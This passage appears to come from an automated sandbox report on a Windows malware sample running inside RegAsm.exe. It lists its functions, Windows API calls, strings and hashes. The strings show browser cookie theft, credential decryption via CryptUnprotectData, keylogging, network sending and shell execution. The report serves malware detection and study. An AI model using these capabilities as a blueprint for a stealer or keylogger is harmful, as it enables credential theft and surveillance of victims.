                                                                • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00450A54
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00450A66
                                                                • _free.LIBCMT ref: 00450A78
                                                                • _free.LIBCMT ref: 00450A8A
                                                                • _free.LIBCMT ref: 00450A9C
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _free.LIBCMT ref: 00444106
                                                                  • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                • _free.LIBCMT ref: 00444118
                                                                • _free.LIBCMT ref: 0044412B
                                                                • _free.LIBCMT ref: 0044413C
                                                                • _free.LIBCMT ref: 0044414D
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$ErrorFreeHeapLast
                                                                • String ID:
                                                                • API String ID: 776569668-0
                                                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                Function 0044E769 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _strpbrk.LIBCMT ref: 0044E7B8
                                                                • _free.LIBCMT ref: 0044E8D5
                                                                  • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                                  • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                  • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                • String ID: *?$.
                                                                • API String ID: 2812119850-3972193922
                                                                • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                Function 00415B25 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CountEventTick
                                                                • String ID: !D@$NG
                                                                • API String ID: 180926312-2721294649
                                                                • Opcode ID: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                                • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                • Opcode Fuzzy Hash: 8a75b7b28f678e250e8660480d12a5fc3fd1b4be0bc449009060b37327f5e913
                                                                • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                Function 00409EDE Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                  • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                  • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F96,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C5BB
                                                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                • String ID: XQG$NG$PG
                                                                • API String ID: 1634807452-3565412412
                                                                • Opcode ID: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                • Opcode Fuzzy Hash: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                • _free.LIBCMT ref: 004435E0
                                                                • _free.LIBCMT ref: 004435EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _free$FileModuleName
                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                • API String ID: 2506810119-1068371695
                                                                • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,6CCF8300,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                  • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                • String ID: /sort "Visit Time" /stext "$0NG
                                                                • API String ID: 368326130-3219657780
                                                                • Opcode ID: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                                • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                • Opcode Fuzzy Hash: 954e782024b67c864ede7c4510563d62e1992c79ce0d6a0ea0cfeeaa97580bb4
                                                                • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                Function 0041631F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wcslen.LIBCMT ref: 00416330
                                                                  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                  • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
                                                                  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
                                                                  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _wcslen$CloseCreateValue
                                                                • String ID: !D@$okmode$PG
                                                                • API String ID: 3411444782-3370592832
                                                                • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                Strings
                                                                • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                • API String ID: 1174141254-1980882731
                                                                • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                Function 0040B19F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                • wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EventLocalTimewsprintf
                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                • API String ID: 1497725170-1359877963
                                                                • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateThread$LocalTime$wsprintf
                                                                • String ID: Online Keylogger Started
                                                                • API String ID: 112202259-1258561607
                                                                • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: CryptUnprotectData$crypt32
                                                                • API String ID: 2574300362-2380590389
                                                                • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                • SetEvent.KERNEL32(?), ref: 004051D9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseEventHandleObjectSingleWait
                                                                • String ID: Connection Timeout
                                                                • API String ID: 2055531096-499159329
                                                                • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Exception@8Throw
                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                • API String ID: 2005118841-1866435925
                                                                • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 1818849710-4028850238
                                                                • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                  • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                • String ID: bad locale name
                                                                • API String ID: 3628047217-1405518554
                                                                • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                • SetForegroundWindow.USER32 ref: 00416CA8
                                                                  • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                  • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                  • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                                • String ID: !D@
                                                                • API String ID: 3446828153-604454484
                                                                • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExecuteShell
                                                                • String ID: /C $cmd.exe$open
                                                                • API String ID: 587946157-3896048727
                                                                • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                • String ID: pth_unenc
                                                                • API String ID: 3123878439-4028850238
                                                                • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                Strings
